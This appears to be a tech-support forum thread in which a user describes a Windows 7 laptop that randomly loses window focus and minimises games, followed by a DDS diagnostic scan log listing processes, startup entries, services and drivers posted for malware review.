S3 aspnet_state;ASP.NET State Service; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2014-04-11 50864]
S3 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files (x86)\Common Files\Autodesk Shared\Service\AdskScSrv.exe [2015-07-14 74360]
S3 dbupdatem;Dropbox Update Service (dbupdatem); C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-07-23 134512]
S3 FlexNet Licensing Service 64;FlexNet Licensing Service 64; C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe [2015-07-18 1369856]
S3 fsssvc;Windows Live Family Safety Service; C:\Program Files (x86)\Windows Live\Family Safety\fsssvc.exe [2014-03-31 1512640]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe /V []
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2015-08-26 149160]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2009-07-14 20992]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe []
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2014-04-12 139944]
-----------------EOF-----------------

Attached Files
File Type: txt info.txt (23.9 KB)

Laptop randomly deselects/minimises windows

I posted the following thread in Laptop Support:

Quote:

This problem is difficult to describe and I don't know the correct terminology I should be using, so I'm having a hard time Googling it or solving it on my own. Essentially, my computer randomly 'deselects' whatever window I have open and seems to go to desktop in some way. If I'm browsing the Internet, the title bar/area where tabs are displayed at the top will grey out as though I've clicked another window, and scrolling with the mouse or typing will no longer produce any effect. For example, while typing this thread out, halfway through the keys ceased to produce letters on the screen. This is easily fixed by my clicking on the page again.

When I play games like Sims 3, Dark Souls or Pillars of Eternity, the game will randomly minimise and I will have to select the game's icon from the taskbar. When I play DDO, the normally DDO-themed mouse pointer will occasionally change into the ordinary Windows pointer but the game will not minimise - I am completely unable to interact with the game at this point and can only start the task manager, blindly click through the game screen where it should have appeared on screen to 'select' it, and then click the DDO icon on the taskbar. As you can imagine, this is extremely irritating, especially when playing fast-paced games like Dark Souls and DDO. This problem also stops my laptop from running a screensaver, as whenever it occurs it seems to count as activity.

My laptop is a Novatech Elite n-series (I forget the exact number).
Windows 7 Home Premium
Processor: Intel Core i7-4700MQ CPU @2.40 GHz
16GB RAM
64-bit operating system
2 disk drives: PLEXTOR PX128-M5M SCSI Disk Device and Samsung SSD 840 EVO 250G SCSI Disk Device

Thank you.

As we were unable to find the cause of the problem, Masterchiefxx17 decided that the best course of action would be to post in Virus/Trojan/Spyware Help.

Here is 'dds.txt':

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18015
Run by Oscar at 3:41:13 on 2015-09-15
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.44.1033.18.16300.11594 [GMT 1:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus *Enabled* {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Program Files\AuthenTec TrueSuite\TrueSuiteService.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k WbioSvcGroup
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\AVAST Software\Avast\afwServ.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\AuthenTec TrueSuite\TouchControl.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files (x86)\Google\Update\1.3.28.13\GoogleCrashHandler.exe
C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\AuthenTec TrueSuite\KeepSafe\fvsvr.exe
C:\Program Files (x86)\Google\Update\1.3.28.13\GoogleCrashHandler64.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\Hotkey\PowerBiosServer.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Users\Oscar\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Oscar\AppData\Local\Amazon Music\Amazon Music Helper.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
C:\Program Files (x86)\Hotkey\Hotkey.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\AuthenTec TrueSuite\BioMonitor.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\Common Files\AuthenTec\TrueService.exe
C:\Program Files (x86)\BlueStacks\HD-Agent.exe
C:\Program Files\Common Files\AuthenTec\TrueService.exe
C:\Program Files (x86)\Common Files\Steam\SteamService.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\GWX\GWX.exe
C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
C:\Program Files (x86)\Hotkey\WRadio.exe
C:\Windows\system32\taskeng.exe
C:\Program Files (x86)\Samsung Magician\Samsung Magician.exe
C:\Program Files (x86)\Trusteer\Rapport\bin\RapportService.exe
C:\Program Files (x86)\Intel\Bluetooth\BTPlayerCtrl.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
C:\Program Files (x86)\BlueStacks\HD-Service.exe
C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
C:\Program Files (x86)\BlueStacks\HD-Network.exe
C:\Program Files (x86)\BlueStacks\HD-BlockDevice.exe
C:\Program Files (x86)\BlueStacks\HD-SharedFolder.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe
C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uSearch Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
mSearch Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
mWinlogon: Userinit = userinit.exe
BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\office15\urlredir.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\Steam.exe" -silent
uRun: [ISUSPM] C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler
uRun: [OneDrive] "C:\Users\Oscar\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [Akamai NetSession Interface] "C:\Users\Oscar\AppData\Local\Akamai\netsession_win.exe"
uRun: [Amazon Music] "C:\Users\Oscar\AppData\Local\Amazon Music\Amazon Music Helper.exe"
mRun: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
mRun: [DivXMediaServer] C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
mRun: [BlueStacks Agent] C:\Program Files (x86)\BlueStacks\HD-Agent.exe
mRun: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\Hotkey.lnk - C:\Program Files (x86)\Hotkey\Hotkey.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MCAFEE~1.LNK - C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
uPolicies-Explorer: NoResolveTrack = dword:1
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: SoftwareSASGeneration = dword:1
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: Send to Bluetooth - C:\Program Files (x86)\Intel\Bluetooth\btSendToObject.htm
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\onbttnie.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
TCP: NameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{5BD31AEB-B371-4B4B-B1EF-4CE37F7FBCAB} : DHCPNameServer = 137.73.254.10 159.92.254.10
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC} : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\244584572653D223349375 : DHCPNameServer = 192.168.1.254
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\2656C6B696E6E2634323 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\5735D23547574656E64736F6D6 : DHCPNameServer = 77.244.128.44 77.244.128.45
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\6796277696E6D65646961643938353230313F5548545 : DHCPNameServer = 194.168.4.100 194.168.8.100
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\D4567616265737D275966696 : DHCPNameServer = 10.0.0.1 10.0.0.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\E4544574541425 : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{E27E1375-7861-46BC-84A1-0B0FBBF97EFC}\F54586560234C6F65746 : DHCPNameServer = 10.1.5.153 10.1.5.154
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= C:\Windows\SysWOW64\nvinit.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-BHO: avast! Online Security: {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\urlredir.dll
x64-Run: [RTHDVCPL] "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
x64-Run: [IAStorIcon] "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
x64-Run: [BLEServicesCtrl] C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe
x64-Run: [BTMTrayAgent] rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
x64-Run: [KeepSafe] "C:\Program Files\AuthenTec TrueSuite\KeepSafe\fvsvr.exe" /startup
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [MSC] "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\onbttnie.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ochelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
============= SERVICES / DRIVERS ===============
.
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2013-10-4 42664]
R0 amdkmpfd;AMD PCI Root Bus Lower Filter;C:\Windows\System32\drivers\amdkmpfd.sys [2013-10-4 36096]
R0 aswNdisFlt;Avast! Firewall Driver;C:\Windows\System32\drivers\aswNdisFlt.sys [2015-8-14 454016]
R0 aswRvrt;avast! Revert;C:\Windows\System32\drivers\aswRvrt.sys [2014-9-28 65224]
R0 aswVmm;avast! VM Monitor;C:\Windows\System32\drivers\aswVmm.sys [2014-9-28 274808]
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-10-4 644968]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-10-4 28008]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-6-13 20464]
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R0 ngvss;ngvss;C:\Windows\System32\drivers\ngvss.sys [2015-8-14 115152]
R0 nvpciflt;nvpciflt;C:\Windows\System32\drivers\nvpciflt.sys [2015-9-1 31352]
R0 RapportHades64;RapportHades64;C:\Windows\System32\drivers\RapportHades64.sys [2015-6-21 139896]
R0 RapportKE64;RapportKE64;C:\Windows\System32\drivers\RapportKE64.sys [2013-11-8 394584]
R1 aswKbd;aswKbd;C:\Windows\System32\drivers\aswKbd.sys [2014-10-13 28144]
R1 aswSnx;aswSnx;C:\Windows\System32\drivers\aswsnx.sys [2014-9-28 1048344]
R1 aswSP;aswSP;C:\Windows\System32\drivers\aswSP.sys [2014-9-28 447944]
R1 RapportCerberus_1507067;RapportCerberus_1507067;C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus64_1507067.sys [2015-9-3 958744]
R1 RapportEI64;RapportEI64;C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportEI64.sys [2015-8-12 500184]
R1 RapportPG64;RapportPG64;C:\Program Files (x86)\Trusteer\Rapport\bin\x64\RapportPG64.sys [2015-8-12 489240]
R2 AMPPALR3;Intel® Centrino® Wireless Bluetooth® + High Speed Service;C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe [2013-2-13 770528]
R2 aswHwid;avast! HardwareID;C:\Windows\System32\drivers\aswHwid.sys [2014-9-28 28656]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2014-9-28 90968]
R2 aswStm;aswStm;C:\Windows\System32\drivers\aswStm.sys [2014-9-28 150672]
R2 avast! Antivirus;Avast Antivirus;C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2015-8-14 146600]
R2 avast! Firewall;Avast Firewall;C:\Program Files\AVAST Software\Avast\afwServ.exe [2015-8-14 109008]
R2 Bluetooth Device Monitor;Bluetooth Device Monitor;C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe [2012-12-13 1120784]
R2 Bluetooth Media Service;Bluetooth Media Service;C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe [2012-12-3 1361856]
R2 Bluetooth OBEX Service;Bluetooth OBEX Service;C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe [2012-12-3 1148864]
R2 BstHdDrv;BlueStacks Hypervisor;C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [2015-5-2 145528]
R2 BTHSSecurityMgr;Intel(R) Centrino(R) Wireless Bluetooth(R) + High Speed Security Service;C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe [2012-9-12 135984]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-5-11 2765496]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-14 27136]
R2 FPLService;TrueSuiteService;C:\Program Files\AuthenTec TrueSuite\TrueSuiteService.exe [2012-8-24 2125160]
R2 GfExperienceService;NVIDIA GeForce Experience Service;C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [2015-8-14 1155192]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-8-7 15720]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2012-12-10 732160]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-10-23 167736]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-9-27 124568]
R2 NvNetworkService;NVIDIA Network Service;C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [2014-9-20 1872504]
R2 NvStreamSvc;NVIDIA Streamer Service;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2015-8-14 5544568]
R2 PowerBiosServer;PowerBiosServer;C:\Program Files (x86)\Hotkey\PowerBiosServer.exe [2013-4-15 46592]
R2 RapportMgmtService;Rapport Management Service;C:\Program Files (x86)\Trusteer\Rapport\bin\RapportMgmtService.exe [2015-8-12 2255128]
R2 VBoxAswDrv;VBoxAsw Support Driver;C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [2015-8-14 273824]
R2 ZeroConfigService;Intel(R) PROSet/Wireless Zero Configuration Service;C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2013-2-8 3386608]
R3 AMPPAL;Intel® Centrino® Wireless Bluetooth® + High Speed Virtual Adapter;C:\Windows\System32\drivers\AmpPal.sys [2013-2-13 163808]
R3 AvastVBoxSvc;AvastVBox COM Service;C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [2015-8-14 4047768]
R3 BstHdAndroidSvc;BlueStacks Android Service;C:\Program Files (x86)\BlueStacks\HD-Service.exe [2015-5-2 433784]
R3 BstHdLogRotatorSvc;BlueStacks Log Rotator Service;C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [2015-5-2 413304]
R3 BstHdUpdaterSvc;BlueStacks Updater Service;C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [2015-5-2 831096]
R3 iusb3hub;Intel(R) USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-6-13 368112]
R3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-6-13 786416]
R3 MBfilt;MBfilt;C:\Windows\System32\drivers\MBfilt64.sys [2013-10-4 32344]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-8-14 19576]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\drivers\nvvad64v.sys [2015-9-1 50472]
R3 RSBASTOR;Realtek PCIE CardReader Driver - BA;C:\Windows\System32\drivers\RtsBaStor.sys [2013-10-23 308960]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2013-10-4 883928]
R3 ScpVBus;Scp Virtual Bus Driver;C:\Windows\System32\drivers\ScpVBus.sys [2013-12-27 39168]
R3 SmbDrvI;SmbDrvI;C:\Windows\System32\drivers\Smb_driver_Intel.sys [2013-6-11 31032]
R3 TrueService;TrueAPI Service component;C:\Program Files\Common Files\AuthenTec\TrueService.exe [2012-7-16 401256]
R3 usbfilter;AMD USB Filter Driver;C:\Windows\System32\drivers\usbfilter.sys [2013-10-4 58536]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-12 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 dbupdate;Dropbox Update Service (dbupdate);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-9-12 136048]
S2 McOobeSv2;McAfee OOBE Service2;"C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc --> C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-7-9 327296]
S3 ahcix64s;ahcix64s;C:\Windows\System32\drivers\ahcix64s.sys [2013-10-4 293720]
S3 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2013-10-4 82600]
S3 amdhub30;AMD USB 3.0 Hub Driver;C:\Windows\System32\drivers\amdhub30.sys [2013-10-4 108128]
S3 amdxhc;AMD USB 3.0 Host Controller Driver;C:\Windows\System32\drivers\amdxhc.sys [2013-10-4 228448]
S3 AMPPALP;Intel® Centrino® Wireless Bluetooth® + High Speed Protocol;C:\Windows\System32\drivers\AmpPal.sys [2013-2-13 163808]
S3 asahci64;asahci64;C:\Windows\System32\drivers\asahci64.sys [2013-10-4 52440]
S3 asmthub3;ASMedia USB3 Hub Service;C:\Windows\System32\drivers\asmthub3.sys [2013-10-4 140032]
S3 asmtxhci;ASMEDIA XHCI Service;C:\Windows\System32\drivers\asmtxhci.sys [2013-10-4 420608]
S3 btmaux;Intel Bluetooth Auxiliary Service;C:\Windows\System32\drivers\btmaux.sys [2012-10-30 131968]
S3 btmhsf;btmhsf;C:\Windows\System32\drivers\btmhsf.sys [2012-12-3 1342848]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe --> C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe [?]
S3 dbupdatem;Dropbox Update Service (dbupdatem);C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2015-9-12 136048]
